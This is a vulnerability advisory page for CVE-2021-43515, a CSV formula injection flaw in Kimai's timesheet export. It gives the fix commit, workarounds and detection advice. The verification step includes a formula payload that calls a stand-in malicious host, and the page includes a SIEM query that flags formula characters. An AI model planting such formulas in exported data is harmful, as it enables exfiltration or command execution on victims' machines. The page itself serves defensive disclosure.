Login Sign Up

CVE-2021-43515

7.8 HIGH

📋 TL;DR

CVE-2021-43515 is a CSV injection vulnerability in Kimai time tracking software that allows attackers to inject malicious formulas into exported CSV files. When users open these files in spreadsheet applications like Excel, the formulas can execute arbitrary commands or access external resources. This affects all Kimai users who export timesheet data to CSV format.

💻 Affected Systems

Products:
  • Kimai
Versions: Kimai 2 versions before commit dad1b8b772947f1596175add1b4f33b791705507
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in the timesheet export functionality; requires user to export and open CSV in vulnerable spreadsheet software.

📦 What is this software?

Kimai by Kimai

View all CVEs affecting Kimai →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution on victim's machine when malicious CSV is opened in vulnerable spreadsheet software, potentially leading to full system compromise, data theft, or ransomware deployment.

🟠

Likely Case

Data exfiltration via formula-based requests to attacker-controlled servers, or local file access through spreadsheet macro execution.

🟢

If Mitigated

Limited impact with proper user awareness training and spreadsheet security settings preventing automatic formula execution.

🌐 Internet-Facing: MEDIUM - Requires user interaction (opening CSV file) but can be delivered via web interface exports.
🏢 Internal Only: MEDIUM - Internal users could create malicious timesheets affecting colleagues who export and open CSV files.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires authenticated access to create timesheets; CSV injection techniques are well-documented and easy to implement.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Fixed in commit dad1b8b772947f1596175add1b4f33b791705507

Vendor Advisory: https://github.com/kevinpapst/kimai2/commit/dad1b8b772947f1596175add1b4f33b791705507

Restart Required: No

Instructions:

1. Update Kimai to latest version or apply commit dad1b8b772947f1596175add1b4f33b791705507
2. Verify timesheet export functionality properly escapes formula characters
3. No service restart required for web application

🔧 Temporary Workarounds

Input Sanitization

all

Add custom validation to escape formula characters (=, +, -, @) in timesheet description field

Modify Kimai source to escape CSV formula characters before export

Export Format Restriction

all

Disable CSV export or require additional approval for timesheet exports

Configure Kimai to disable CSV export functionality

🧯 If You Can't Patch

  • Implement web application firewall rules to block formula characters in timesheet descriptions
  • Train users to never open CSV files directly in spreadsheet applications; use text editors or import with data-only settings

🔍 How to Verify

Check if Vulnerable:

Create timesheet with description containing '=HYPERLINK("http://malicious.com")' and export to CSV. Open in Excel - if link executes, system is vulnerable.

Check Version:

Check Kimai version via web interface or git log for commit dad1b8b772947f1596175add1b4f33b791705507

Verify Fix Applied:

Repeat vulnerable test - formula characters should be escaped or prefixed with apostrophe in exported CSV.

📡 Detection & Monitoring

Log Indicators:

  • Multiple CSV exports from single user
  • Timesheet descriptions containing formula characters (=, +, -, @)

Network Indicators:

  • Outbound connections from spreadsheet applications to unusual domains after CSV opens

SIEM Query:

source="kimai" AND (description="=*" OR description="+*" OR description="-*" OR description="@*")

📊 Metadata

CVE ID: CVE-2021-43515
CVSS v3 Score: 7.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-1236
Published: April 8, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-43515, you might also want to check these:

CVE-2022-45360 9.8

This vulnerability allows CSV injection attacks in the WordPress Commenter Emails plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-45810 9.8

This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-46803 9.8

This vulnerability allows unauthenticated attackers to inject malicious formulas into CSV files expo...

Same vulnerability type (CWE-1236)